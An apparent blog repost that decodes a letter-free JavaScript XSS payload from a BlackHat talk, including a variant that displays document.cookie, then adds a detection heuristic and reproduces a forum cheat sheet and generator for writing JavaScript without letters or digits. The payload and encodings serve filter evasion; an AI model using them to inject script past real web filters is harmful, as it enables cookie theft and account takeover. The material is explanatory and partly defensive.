javascript ninja

Posted on January 22, 2011.

from http://adamcecc.blogspot.com/2011/01/javascript.html

Friday, January 21, 2011

JavaScript ( (__ = !$ + $)[+$] + ({} + $)[_/_] +({} + $)[_/_] )

First off credit where credit is due.

1) I didn’t write this JavaScript.
2) I didn’t find this JavaScript.

I saw it in a slide deck from BlackHat DC 2011 called XSS Street-Fight. Most of the presentation was dry JavaScript/mod_security, but this caught my eye.

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+
($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__
[_+~$]+$_[_]+$$](_/_)

Care to guess what that does?

How about if I type it like this.

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+
($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__
[_+~$]+$_[_]+$$](document.cookie)

That’s right, this is an alert(): if it lands anywhere in
an executable section of JavaScript/DOM it pops up the cookie.

Go ahead and put it in a script tag in your browser; it will pop up a "1".

That’s when I couldn’t put this down.

First there are really two lines here.

($ = [ $=[]] [ (__ = !$ + $ )[ _ = -~-~-~$] + ({} + $)[_/_] + ( $$ = (
$_ = !'' + $)[_/_] + $_[+$] ) ] )()

becomes sort()

[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

becomes alert(1)

Let’s start to tear this apart.

$=[] is a blank array

$=[$=[]] is an array with a reference to an array.

So $ derefs to the value 0.

Now we have a character we can freely reference.

__ = "false"null via (__ = !$ + $ )
_ = -~-~-~$

(The ~ operator in JavaScript means -(N+1), so -~ = +1;
if $ = 0 then -~-~-~$ = 3.)

_ = 3

thus _/_ = 3/3 = 1

(__ = !$ + $ )[ _ = -~-~-~$]
("false")[_]
("false")[3]
"false"[3] = s

({} + $)[_/_]
("[object Object]")[_/_]
("[object Object]")[1]
"[object Object]"[1] = o

$$ = ( $_ = !'' + $)[_/_]
$$ = ( "true")[1]
"true"[1] = r

$_[+$] = "true"[0] = t

$_ = "true"null
$$ = rt via

($$ = ( $_ = !'' + $)[_/_] + $_[+$] )

!'' = "true"
$_ = (true)
$_[1] = r
$_[0] = t
$$ = rt

Thus the first line becomes sort()

($ = [ $=[]] ["s" + "o"+ "r"+ "t" ] )()

Sort takes a function as its parameter to execute, thus firing the second line.

[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

$ = 0
_ = 3
__ = "false"
$_ = "true"
$$ = "rt"

[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

becomes
[__[1] + __[3 + -1] + $_[3] + $$](1)

becomes
["false"[1] + “false”[3 + -1 ] + “true”[3] + “rt”] (1)

[ a + l + e + r + t ](1)

alert(1)

Enjoy!

Posted by adamcecc at 1:43 PM
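
An added example for the analysis above, not code from Adam Cecc's blog or the BlackHat deck: a small heuristic for flagging non-alphanumeric JavaScript in content that a filter such as mod_security gets to inspect. The idiom list and the thresholds are assumptions chosen for this example; the payload sample is the one from the post, written with !'' where the blog printed a smart quote.

```javascript
// Added example for this post, not code from Adam Cecc's blog or the BlackHat
// deck: a heuristic for flagging non-alphanumeric JavaScript in content that
// a filter such as mod_security gets to inspect. Ordinary code is mostly
// identifiers and keywords; the payload above contains no letters or digits
// at all and leans on a handful of well-known coercion idioms.
const COERCION_IDIOMS = [
  /!\[\]/,          // ![]    -> false
  /!\$\+\$/,        // !$+$   -> "false" when $ is [] (the variant above)
  /\{\}\+/,         // {}+x   -> "[object Object]"
  /-~-~/,           // -~-~x  -> x + 2, counting with bitwise NOT
  /\[\]\[\[\]\]/,   // [][[]] -> undefined
  /!(''|"")\+/,     // !''+x  -> "true"
];

// Returns the share of non-alphanumeric characters, the number of idioms
// matched, and a verdict. The thresholds are assumptions chosen for this
// example, not tuned values.
function scoreNonAlnum(src) {
  const code = src.replace(/\s+/g, '');        // whitespace is free in JS
  if (code.length === 0) return { ratio: 0, idioms: 0, suspicious: false };
  const alnum = (code.match(/[A-Za-z0-9]/g) || []).length;
  const ratio = 1 - alnum / code.length;
  const idioms = COERCION_IDIOMS.filter((re) => re.test(code)).length;
  return { ratio, idioms, suspicious: ratio > 0.85 && idioms >= 2 };
}

// Constructed samples: the sort()/alert(1) payload from the post above (with
// !'' where WordPress printed a smart quote) and two benign snippets.
const PAYLOAD =
  "($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()" +
  "[__[_/_]+__[_+~$]+$_[_]+$$](_/_)";
const BENIGN = 'document.getElementById("out").textContent = String(count + 1);';
const MINIFIED = 'var a=[1,2,3],b=a.map(function(x){return x*2});';

for (const sample of [PAYLOAD, BENIGN, MINIFIED]) console.log(scoreNonAlnum(sample));
```

The payload scores a ratio of 1 with four idioms matched, while both benign snippets stay well under the threshold with none.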

And here is a cheat sheet for replacing alphanumeric characters

from: http://sla.ckers.org/forum/read.php?24,33349,33405

Java/script: no alnum cheat sheets
Posted by: SW
Date: February 09, 2010 09:12PM

Cheat sheets of the shortest ways we can find to accomplish things with different no alnum charsets.

Feel free to fill in different charsets and of course if you find a shorter version of a letter post it.

Charset: []()+ (seemingly impossible to execute with)

0: 3: +[]
1: 11: ++[[]][+[]]
2: 20: ++[++[[]][+[]]][+[]]
3: 29: ++[++[++[[]][+[]]][+[]]][+[]]
10: 17: ++[[]][+[]]+[+[]]

undefined: 6: [][[]]
Infinity: 86: +(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])
NaN: 7: +[][[]]

a: 25: "NaN"[1]
   (+[][[]]+[])[++[[]][+[]]]
b:  :
c:  :
d: 33: "undefined"[2]
   ([][[]]+[])[++[++[[]][+[]]][+[]]]
e: 37: "NaNundefined"[10]
   ([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]
f: 51: "undefined"[4]
   ([][[]]+[])[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]]
g:  :
h:  :
i: 60: "undefined"[5]
   ([][[]]+[])[++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]
j:  :
k:  :
l:  :
m:  :
n: 24: "undefined"[1]
   ([][[]]+[])[++[[]][+[]]]
o:  :
p:  :
q:  :
r:  :
s:  :
t:  :
u: 16: "undefined"[0]
   ([][[]]+[])[+[]]
v:  :
w:  :
x:  :
y: 115: "NaNInfinity"[10]
   (+[][[]]+[+(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])])[++[[]][+[]]+[+[]]]
z:  :  

A:  :
B:  :
C:  :
D:  :
E:  :
F:  :
G:  :
H:  :
I: 94: "Infinity"[0]
   (+(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])+[])[+[]]
J:  :
K:  :
L:  :
M:  :
N: 17: "NaN"[0]
   (+[][[]]+[])[+[]]
O:  :
P:  :
Q:  :
R:  :
S:  :
T:  :
U:  :
V:  :
W:  :
X:  :
Y:  :
Z:  :

Charset: []()+! (six with !)

0: 3: +[]
1: 5: +!+[]
2: 9: !+[]+!+[]
3: 14: !+[]+!+[]+!+[]
10: 11: +!+[]+[+[]]

undefined: 6: [][[]]
Infinity: 60: +(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])
NaN: 6: +[![]]
true: 4: !![]
false: 3: ![]

a: 15: "false"[1]
   (![]+[])[+!+[]]
b: 424: ([]["sort"]["call"]()+[])[2]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]
c: 144: ([]["filter"]+[])[3]
   ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
d: 22: "undefined"[2]
   ([][[]]+[])[!+[]+!+[]]
e: 27: "true"[3]
   (!+[]+[])[!+[]+!+[]+!+[]]
f: 13: "false"[0]
   (![]+[])[+[]]
g:  :
h:  : []["sort"]["call"]()["atob"]("aN")[0]
i: 27: "falseundefined"[10]
   ([![]]+[][[]])[+!+[]+[+[]]]
j: 429: ([]["sort"]["call"]()+[])[3]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]
k:  :
l: 19: "false"[2]
   (![]+[])[!+[]+!+[]]
m: 730: (0["constructor"]+[])[11]
   ((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]
n: 18: "undefined"[1]
   ([][[]]+[])[+!+[]]
o: 143: (true+[]["filter"])[10]
   (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
p:  :
q:  :
r: 16: "true"[1]
   (!![]+[])[+!+[]]
s: 24: "false"[3]
   (![]+[])[!+[]+!+[]+!+[]]
t: 14: "true"[0]
   (!![]+[])[+[]]
u: 15: "undefined"[0]
   ([][[]]+[])[+[]]
v:  :
w:  : "[object Window]"[13]
x:  :
y: 84: "NaNInfinity"[10]
   (+[![]]+[+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])])[+!+[]+[+[]]]
z:  :  

A:  :
B: 731: 0+false["constructor"][10]
   (+[]+(![])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+[]]]
C: 1048: []["sort"]["call"]()["atob"]("10N")[1]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]
D:  :
E:  :
F: 1047: []["sort"]["call"]()["atob"]("10a")[1]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(![]+[])[+!+[]])[+!+[]]
G:  :
H:  :
I: 94: "Infinity"[0]
   (+(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])+[])[+[]]
J:  :
K:  :
L:  :
M:  : []["sort"]["call"]()["btoa"](0)[0]
N: 16: "NaN"[0]
   (+[![]]+[])[+[]]
O:  :
P:  :
Q:  : []["sort"]["call"]()["btoa"]("a")[1]
R:  :
S:  :
T:  :
U:  :
V:  :
W:  : "true[object Window]"[12]
X:  :
Y:  : []["sort"]["call"]()["btoa"]("a")[0]
Z:  : []["sort"]["call"]()["btoa"]("f")[0]

Charset: []()+= (six with = bit longer but might be more useful if using 1 variable)

true: 9: ([]==+[])
false: 8: ([]==[])

a:  :
b:  :
c:  :
d:  :
e:  :
f: 18: "false"[0]
   (([]==[])+[])[+[]]
g:  :
h:  :
i:  :
j:  :
k:  :
l:  :
m:  :
n:  :
o:  :
p:  :
q:  :
r:  :
s:  :
t: 19: "true"[0]
   (([]==+[])+[])[+[]]
u:  :
v:  :
w:  :
x:  :
y:  :
z:  :  

A:  :
B:  :
C:  :
D:  :
E:  :
F:  :
G:  :
H:  :
I:  :
J:  :
K:  :
L:  :
M:  :
N:  :
O:  :
P:  :
Q:  :
R:  :
S:  :
T:  :
U:  :
V:  :
W:  :
X:  :
Y:  :
Z:  :

Charset: []()+!{}/., (everything?)

a:  :
b:  :
c:  :
d:  :
e:  :
f:  :
g:  :
h:  :
i:  :
j:  :
k:  :
l:  :
m:  :
n:  :
o:  :
p:  :
q:  :
r:  :
s:  :
t:  :
u:  :
v:  :
w:  :
x:  :
y:  :
z:  :  

A:  :
B:  :
C:  :
D:  :
E:  :
F:  :
G:  :
H:  :
I:  :
J:  :
K:  :
L:  :
M:  :
N:  :
O:  :
P:  :
Q:  :
R:  :
S:  :
T:  :
U:  :
V:  :
W:  :
X:  :
Y:  :
Z:  :

Edited 16 time(s). Last edit at 02/10/2010 08:23PM by SW.
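
As an added example (not SW's code), the following rebuilds the "[]()+!" letter table above mechanically from the coerced values that charset can reach, and evaluates each generated expression to confirm it yields its letter. The primitive list and digit encodings are the ones the sheet uses; the Function-source and sort.call tricks are deliberately left out (the sort.call entries also rely on pre-ES5 engines turning an undefined this into the global object), so the same letters remain blank.

```javascript
// Added example for this thread, not SW's code: rebuild the "[]()+!" letter
// table from the values whose string form that charset can reach, and verify
// each generated expression. Function-source tricks (filter, sort.call, atob)
// are left out, so b, c, m, o and the rest stay unreachable, as in the sheet.
const PRIMITIVES = [
  { expr: '![]+[]',       str: 'false' },
  { expr: '!![]+[]',      str: 'true' },
  { expr: '[][[]]+[]',    str: 'undefined' },
  { expr: '+[![]]+[]',    str: 'NaN' },
  { expr: '[![]]+[][[]]', str: 'falseundefined' },      // "i" at index 10
  // +"1e1000" overflows to Infinity; (!![]+[])[3] supplies the "e"
  { expr: '+(+!+[]+(!![]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])+[]',
    str: 'Infinity' },
];

// Digits as in the sheet: +[] is 0, +!+[] is 1, n copies of !+[] add up to n.
function digitExpr(n) {
  if (n === 0) return '+[]';
  if (n === 1) return '+!+[]';
  return Array(n).fill('!+[]').join('+');
}

// Indexes above 9: number + [digit] concatenates to the string "ab",
// e.g. +!+[]+[+[]] is 1 + ["0"], which is "10".
function indexExpr(n) {
  if (n < 10) return digitExpr(n);
  return digitExpr(Math.floor(n / 10)) + '+[' + digitExpr(n % 10) + ']';
}

// For every letter keep the shortest (primitive)[index] expression found.
function letterTable() {
  const table = {};
  for (const { expr, str } of PRIMITIVES) {
    for (let i = 0; i < str.length; i++) {
      const candidate = '(' + expr + ')[' + indexExpr(i) + ']';
      const ch = str[i];
      if (!table[ch] || candidate.length < table[ch].length) table[ch] = candidate;
    }
  }
  return table;
}

// Evaluate a generated expression on its own to confirm it yields the letter.
function evalExpr(expr) {
  return Function('"use strict"; return (' + expr + ');')();
}
for (const [ch, expr] of Object.entries(letterTable())) {
  console.log(ch + ': ' + expr.length + ': ' + expr + (evalExpr(expr) === ch ? '' : ' MISMATCH'));
}
```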

Waiting until every character is available :p
And rather than dumbly memorising it, here is a helper tool:
http://discogscounter.getfreehosting.co.uk/js-noalnum.php
OK, it has been a long time since I posted, and the one time I do, it gives me a headache.

One Response to "javascript ninja"


Good, no characters went missing, huweh, filtered with opho yo :p

